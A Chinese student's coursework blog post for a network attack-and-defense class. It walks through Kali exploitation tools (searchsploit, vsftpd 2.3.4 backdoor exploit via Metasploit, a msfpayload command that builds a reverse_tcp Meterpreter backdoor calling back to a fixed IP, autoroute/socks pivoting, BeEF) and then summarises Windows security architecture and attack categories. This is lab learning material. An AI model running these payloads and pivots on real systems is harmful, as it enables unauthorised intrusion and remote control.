1. 程式人生 > >2017-2018-2 20179207 《網絡攻防技術》第七周作業

2017-2018-2 20179207 《網絡攻防技術》第七周作業

其中 api 關閉 授權 -c 現狀 srm 安全模型 體系

kali視頻(26-31)(漏洞利用)

漏洞利用之檢索與利用

漏洞利用工具集

  • 1.searchsploit

    Exploit Database->searchsploit

技術分享圖片

  • 2.pattern create測試漏洞

    armitage結合MSF進行利用

  • 3.jboss-autopwn-linux/win
    專門針對Jboss的漏洞利用工具

  • 4.ikat
    自動化開啟,等待目標訪問中招。

  • 5.termineter
    評估智能電表的安全性。

漏洞利用之metasploit基礎

1.啟動服務:

在kali中使用metasploit,需要先使用命令

service postgresql start

開啟PostgreSQL數據庫服務,使用命令

msfconsole

2.開啟metasploit服務,然後就可以完整的利用msf數據庫查詢exploit和記錄。

技術分享圖片

3.首先用nmap -sV掃描目標主機和端口上運行的軟件的版本。結果顯示目標主機運行著ftp服務器,且版本為vsftpd 2.3.4(此版本的vsftpd存在著漏洞,攻擊者可以遠程獲取目標主機的root權限)。

技術分享圖片

4.輸入use exploit/unix/ftp/vsftpd_234_backdoor,提示符提示進入到該路徑下,show options查看需要設置的相關項。提示需要設置RHOST和RPORT(端口默認為21)

技術分享圖片

5.接下來選擇payload,輸入命令set payload,按Tab鍵自動補齊攻擊載荷cmd/unix/interact,show options查看需要設置的相關項,設置結束後輸入exploit即可實施攻擊。
技術分享圖片

技術分享圖片

  1. 結果返回目標主機的shell,獲取了目標主機的root權限,可以輸入命令查看id、網絡配置等,攻擊也就可以順利實施。

技術分享圖片

技術分享圖片

漏洞利用之Meterpreter介紹

1.生成Meterpreter後門;打開MSF,開啟監聽(選擇exploit/multi/handler);在目標機器上執行door.exe;

技術分享圖片

2.msfpayload windows/meterpreter/reverse_tcp LHOST=222.28.136.234 LPORT=2333 R | msfencode -t exe -c 5 > /root/door.exe

3.查看自己的IP地址,LHOST、LPORT為reverse_tcp的參數,可以在msf裏查看到(記得把服務啟動)

4.用use exploit/multi/handler來接收返回的連接
設置reverse_tcp的LHOST、LPORT參數

技術分享圖片

技術分享圖片

技術分享圖片

技術分享圖片

技術分享圖片

漏洞利用之Metasploit後滲透測試

  • 1.查看跳板機的網卡
ifconfig
  • 2.添加路由表
run autoroute -s 10.0.0.1
  • 3.開socks代理
background 把session置於後臺
search socks  使用socks開代理
use auxiliary/server/socks4a
showoptions
exploit
  • 4.通過background和sessions -i可以自由切換進入session
  • 5.輸入run可以看到在meterpreter上可以做的很多命令
  • 6.通過run post/可以看到後滲透測試的模塊
  • 7.掃描內網信息
run arp_scanner -r 目標IP地址

內網端口轉發

upload lcx.exe c:\ 上傳到C盤根目錄

漏洞利用之beEf

1、在命令行下啟動

BeeFbeef-xss

技術分享圖片

技術分享圖片

2、用戶名和密碼都是beef

技術分享圖片

3、輸入測試網站,可以看到在線機器
技術分享圖片

技術分享圖片

技術分享圖片

4、對網站進行攻擊
技術分享圖片

5、Proxy功能(代理功能)
選中目標主機,點右鍵,在菜單中選中Use as Proxy;然後在Rider選項卡中的Forge Request編輯並發送想要發送的內容
技術分享圖片

技術分享圖片

技術分享圖片

6、BeEF默認是不加載Metasploit的,如果要使用Metasploit豐富的攻擊模塊,需要做些配置.
配置

首先打開beef xss目錄
cd /usr/share/beef-xss/
ls
nano config.yaml

編輯一下,可以看到有很多配置信息,包括用戶名、密碼都可以在這設置,在此將Metasploit的false修改為true

技術分享圖片

技術分享圖片

技術分享圖片

技術分享圖片

技術分享圖片

技術分享圖片

技術分享圖片

技術分享圖片

第七章 Windows操作系統安全防護

Windows操作系統的發展與現狀

Windows在桌面操作系統中占有非常高的市場份額,Windows XP系統在國內仍有大量的用戶

Windows操作系統基本結構
1、Windows操作系統內核基本模塊:Windows執行體、Windows內核體、設備驅動程序、硬件抽象層、Windows窗口與圖形界面接口內核實現代碼。

2、Windows操作系統在用戶態的代碼模塊:系統支持進程、環境子系統服務進程、服務進程、用戶應用軟件、核心子系統DLL。

3、核心機制:Windows進程和線程管理機制、Windows內存管理機制、Windows文件管理機制、Windows註冊表管理機制、Windows的網絡機制。
Windows系統的網絡結構,從OSI網絡參考模型的物理層到應用層,各層對應的Windows網絡組件模塊包括:

①網卡硬件設備驅動程序,位於OSI物理層

②NDIS庫及miniport驅動程序,位於OSI鏈路層

③TDI傳輸層,也被稱為網絡協議驅動,位於OSI網絡層與傳輸層

④網絡API DLL 及TDI客戶端,對應OSI會話層與表示層

⑥網絡應用程序與服務進程,對應OSI應用層

Windows操作系統的安全體系結構與機制

1、Windows安全體系結構

基於引用監控器(Reference Monitor)模型來實現基本的對象安全模型。最核心的是位於內核中的SRM(Security Reference Monitor)安全引用監控器,以及位於用戶態的LSASS安全服務。

2、Windows身份認證機制

分為用戶,用戶組,和計算機三大類。對於每個安全主體,以時間和空間上都全局唯一的SID安全標識符來進行標識。

Windows用戶密碼經過加密處理後被保存於SAM或者活動目錄AD中,其中本地用戶賬戶口令信息經過不可逆的128位隨機秘鑰Hash加密後存儲在SAM文件中。

Windows進程、GINA圖形化登錄窗口,與LSASS服務通過協作來完成本地身份認證過程。

3、Windows授權與訪問控制機制

Windows授權與訪問控制機制是基於引用監控器模型,由內核中的SRM模塊與用戶態的LSASS服務共同來實施。

Windows對於系統中所有需要保護的資源都抽象成對象,而對每個對象會關聯一個SD安全描述符(Security Descriptor)都會關聯一個對象描述符,有以下屬性組成:Owner SID、Group SID、DACL 自主訪問控制列表、SACL 系統審計訪問控制列表。

4、Windows安全審計機制

系統審計策略在本地安全策略中由系統管理員定義,來確定系統對哪些事件進行記錄。

5、Windows的其他安全機制

Windows安全中心中集成了對於保護Windows系統安全穩定運行最為關鍵的三項安全措施:防火墻,補丁自動更新,以及病毒防護。除了安全中心外,Windows的安全特性還包括IPSec加密與驗證機制、EFS加密文件系統、Windows文件保護機制、捆綁的IE瀏覽器所提供的隱私保護與瀏覽安全保護機制等。

6、Windows遠程安全攻防技術

Windows遠程攻擊技術可分為:遠程口令猜測與破解攻擊、攻擊Windows網絡服務、攻擊Windows客戶端及用戶

7、Windows安全漏洞發現、利用與修補過程

安全漏洞公開披露信息庫:幾個知名的通用漏洞信息庫:CVE、NVD、SecurityFocus、OSVDB等。

8、針對特定目標的滲透測試攻擊過程:

①漏洞掃描測試

②查找針對發現漏洞的滲透代碼

③實施滲透測試

9、使用Metasploit軟件實施滲透測試

Metasploit是完全開源的滲透測試軟件。采用開發框架和模塊組件的可擴展模型,以Ruby語言編寫的Metasploit

Framework(MSF)庫作為整個軟件的基礎核心,為滲透測試組件的開發與測試提供平臺;模塊組件是真正實施滲透攻擊的代碼。

Metasploit提供了CLI、Console、Web和GUI四種不同的用戶交互接口,其中Console終端是比較常用的方式。

10、Windows遠程口令猜測與破解攻擊

  • 遠程口令自猜測
  • 遠程口令字交換通信竊聽與破解
  • 遠程口令猜測與破解防範措施

11、Windows網絡服務遠程滲透攻擊

Windows操作系統默認開放135(TCP),137(UDP),139(TCP)與445(TCP)端口,對應的網絡服務為MSRPC與過程調用服務,NetBIOS網絡基本輸入輸出系統服務和SMB文件與打印機共享服務。

  • 針對NetBIOS網絡服務的著名漏洞及攻擊
  • 針對SMB網絡服務的著名漏洞及攻擊
  • 針對MSRPC網絡服務的著名漏洞及攻擊
  • 針對Windows系統上微軟網絡服務的遠程滲透攻擊
  • 針對Windows系統上第三方網絡服務的遠程滲透攻擊

12、網絡服務遠程滲透攻擊防範措施

  • Windows本地安全攻防技術
  • Windows本地特權提升
  • 終極特權:Administrator或者Local System賬戶。從受限用戶權限嘗試獲得特權賬戶的攻擊技術也被稱為特權提升。

13、Windows敏感信息竊取

  • Windows系統口令字密文提取技術
  • Windows系統口令字破解技術
  • 用戶敏感數據竊取
  • 本地敏感信息竊取防範措施

14、Windows消蹤滅跡

  • 關閉審計功能
  • 清理事件日誌
  • 針對消蹤滅跡的防範措施

15、Windows遠程控制與後門程序

  • 命令行遠程控制工具
  • 圖形化遠程控制工具
  • 針對後門程序防範措施

2017-2018-2 20179207 《網絡攻防技術》第七周作業